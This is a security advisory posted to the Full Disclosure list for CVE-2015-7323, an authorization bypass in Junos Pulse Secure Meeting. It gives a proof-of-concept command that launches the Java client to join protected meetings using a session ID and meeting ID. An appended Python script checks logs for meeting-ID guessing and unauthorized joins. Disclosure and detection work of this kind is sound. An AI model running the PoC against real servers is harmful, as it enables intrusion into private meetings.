Message-ID: <CAKP=J_8ujYxvH44Z7N3eCLGc1z=dq16=sgqzp5JawwbcctXhdw@mail.gmail.com>
Date: Thu, 24 Sep 2015 17:29:36 +0200
From: Profundis Labs <profundislabs@...glemail.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2015-7323 - Secure Meeting (Pulse Collaboration) issue may allow authenticated users to bypass meeting authorization

Profundis Labs Security Advisory
https://profundis-labs.com/advisories/CVE-2015-7323.txt

Product:
================================
Junos Pulse Secure Meeting

Secure Meeting is a part of the Junos Pulse Collaboration software, which
allows you to organize and hold virtual meetings with internal and
external users via the Juniper Access Gateway.

Vulnerability Type:
===================
Insufficient Authorization Checks

CVE Reference:
==============
CVE-2015-7323

VENDOR Reference:
=================
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054

Vulnerability Details:
=====================
It is possible to enter "secure" meetings without knowledge of the
password and the invitation link using the Java fat client
(meetingAppSun.jar). To access such meetings the following information
is required:

- A valid sessionID (DSID). This sessionID can be obtained either by
  having an invitation link to any other meeting or by having a valid
  account to log into Junos Pulse using the HTTP login form.
- The meeting ID. The meeting ID is a 7-8 digit number which may be
  obtained using brute force or via CVE-2015-7322
  (https://profundis-labs.com/advisories/CVE-2015-7322.txt)

Note: The vulnerability is only related to the Java fat client. If a user
tries to access a secure meeting using the web browser
(https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0),
the meeting password (or invitation link) is required.

PoC code(s):
===============
Example of how to start the Java fat client to access a meeting A from
the command line:

  java -classpath /usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar \
    SecureMeetingApplication ivehost PARAM_D locale de log_level 1 \
    meeting_type 0 \
    Parameter0 "meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url=" \
    uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" \
    neoteris-dsid "DSID=PARAM_C"

PARAM_A = meeting ID of Meeting A
PARAM_B = md5 hash of the SSL certificate of the Junos Pulse server
PARAM_C = a valid sessionID
PARAM_D = the domain/IP of the Junos Pulse server

Disclosure Timeline:
=========================================================
Vendor Notification:  01/2015
Vendor Confirmation:  03/2015
Vendor Patch Release: 06/2015
Public Disclosure:    09/2015

Affected Version:
=========================================================
8.0.5

Exploitation Technique:
=======================
Remote

Severity Level:
=========================================================
CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
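
Added example, not part of the advisory and not vendor code: a log-review check for the two conditions the advisory describes, one session (DSID) requesting many different meeting IDs, and a meeting being joined with neither a password nor an invitation. The record layout, the invitation list, the threshold and all sample values are assumptions constructed for illustration; a real deployment would map its own exported meeting logs onto these fields.

```python
from collections import defaultdict

# Constructed join records: (session, meeting_id, password_supplied, outcome).
# "session" stands for the DSID the client presented.
EVENTS = [
    ("sess-A", "1234567", True,  "joined"),
    ("sess-B", "1000001", False, "not_found"),
    ("sess-B", "1000002", False, "not_found"),
    ("sess-B", "1000003", False, "not_found"),
    ("sess-B", "1000004", False, "joined"),
    ("sess-C", "7654321", False, "joined"),   # arrived via its invitation link
]

# Constructed invitation list: which session was invited to which meeting.
INVITED = {("sess-A", "1234567"), ("sess-C", "7654321")}


def review_sessions(events, invited, max_meetings=3):
    """Return {session: sorted list of findings} for sessions worth a look."""
    meetings = defaultdict(set)   # session -> distinct meeting IDs requested
    findings = defaultdict(set)   # session -> human-readable findings

    for session, meeting_id, password_supplied, outcome in events:
        meetings[session].add(meeting_id)
        authorized = password_supplied or (session, meeting_id) in invited
        if outcome == "joined" and not authorized:
            findings[session].add(
                "join without password or invitation: " + meeting_id)

    # A session touching many distinct meeting IDs suggests ID guessing.
    for session, ids in meetings.items():
        if len(ids) > max_meetings:
            findings[session].add(
                "requested %d distinct meeting IDs" % len(ids))

    return {s: sorted(f) for s, f in findings.items()}


if __name__ == "__main__":
    for session, notes in review_sessions(EVENTS, INVITED).items():
        for note in notes:
            print(session, "-", note)
```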